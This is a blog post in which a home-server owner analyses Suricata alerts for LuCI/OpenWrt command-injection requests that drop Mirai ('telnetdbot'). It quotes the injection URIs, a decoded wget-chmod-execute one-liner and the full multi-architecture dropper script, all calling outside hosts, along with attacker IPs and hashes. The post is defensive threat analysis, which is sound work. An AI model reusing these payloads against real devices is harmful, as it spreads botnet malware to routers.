by Fred Theilig – @fmtheilig
My home server has been pretty quiet as of late. Sometimes because it’s literally quiet. I will shut it down from time to time because the fans will spin up to max and stay there, making one hell of a racket. Shutting it down a couple days, or a week, seems to give it the rest it needs to behave better. But also, I just haven’t seen anything.
Just past one in the morning on May 16th I got a couple suricata alerts: “ET HUNTING Suspicious Chmod Usage in URI (Inbound)”. The target was my web server and the IP addresses were 195.1.144.109 and 195.1.144.107, both in Oslo, Norway. The Apache logs showed:
GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.15.222.150/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk)
This /cgi-bin/luci/ is new to me, but let’s decode the stuff between the parens:
cd /tmp; rm -rf shk; wget http://103.15.222.150/shk; chmod 777 shk; ./shk tplink; rm -rf shk
Now let’s take a look at this dropper:
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="103.15.222.150"
binout="telnetdbot"
exec="your device just got infected to a bootnoot"
rm -rf $binout
for arch in $binarys
do
rm -rf $arch
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=./$binout $1
if [ "$status" = "$exec" ]; then
rm -rf $binout
break
fi
rm -rf $binout
done
What this does is download each of ten different versions of the payload using either wget, curl, or tftp from 103.15.222.150, saving as the name ‘telnetdbot’, into either /tmp, /var, or /dev (whichever they can change to), change file permissions, then execute it. Pretty brute force, but we’ve seen this before. Using tftp is a new one, but it makes sense. No username or password.
I manually grabbed a copy of the x86 version of this malware. I keep my samples in a folder that clamav ignores. Perhaps it is better opsec were I to download a version for a different architecture, but I have yet to accidentally run malware on my system. I will hold on to the binary for future analysis. So, what is this telnetdbot that promises to infect me to a “bootnoot”? It’s Mirai, specifically trojan.mirai/aiju.
On June 2nd IP 176.97.210.236 sent some very similar traffic my way:
"GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.238%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 26893 "-" "Go-http-client/1.1"
This is pretty much the same as before, the only real is the IP address. Let’s take a closer look at the target of the GET method. Apparently /cgi-bin/luci/ is LuCI WebUI, a configuration interface for OpenWrt.
OpenWrt is an open source router operating system that you can install on many brain-dead commercial routers, giving you much more power and control. I ran this prior to moving to pfSense. I had not heard of LuCI WebUI before.
I grabbed this payload and … of course it’s Mirai, but with a different hash. Note that having a different hash does not imply there is a significant difference from the previous version. Changing as little as a single character and recompiling is enough to do this. The IP of the command and control server may have changed, but this is frequently done to defeat anti-malware software.
I hadn’t noticed before that shk is run with ‘tplink’ as a parameter, but the script does nothing with it. TP-Link is a Chinese manufacturer of consumer grade home routers, the kind one may install OpenWrt on.
Let’s look at the numbers for the May 16 event:
195.1.144.109 Oslo, Norway (GlobalConnect AS)
195.1.144.107 Oslo, Norway (GlobalConnect AS)
103.15.222.150 Vietnam (TAN THANH AN INTERNATIONAL TRADE DEVELOPMENT COMPANY LIMITED)
Telnetdbot SHA256: 283a9d3db3201f027ff81ace1b3daca94ec6cdbd6cde3ca5154fb01053f854b2
First Submission: May 16
And now for June 2:
176.97.210.236 Frankfurt am Main, Hesse, Germany
176.97.210.238 Frankfurt am Main, Hesse, Germany
Telnetdbot SHA256: 29866f6d51987d93baadb3478ef1c2ae91172d1d74e1bbeaf7ea8d4efaf8da8d
First Submission: May 31
My Takeaway:
First, if you are not using CyberChef, you are missing out. It comes built in with my Security Onion instance but you can easily run it locally, or just use the url. It decodes obfuscated text like a champ.
Second, it is surprising how recent these specific malware variants have been seen. The first one hit my server on day one and the second on day three.
Perhaps most importantly, the LuCI configuration interface is a thing and it might still have a vulnerability. The attacker may be using a very old vector of attack with brand new Mirai binaries, but I just don’t know. Had I not a full time job, and a fuller time life outside of my job, I might stand up an OpenWrt instance with LuCI and run some tests. Can you run OpenWrt in a VM? I feel like this should be possible.
If you run LuCI on OpenWRT, take care. Update it to the latest release, don’t present the interface to the open internet, and verify that you haven’t been ‘infected to a bootnoot’. Be careful out there.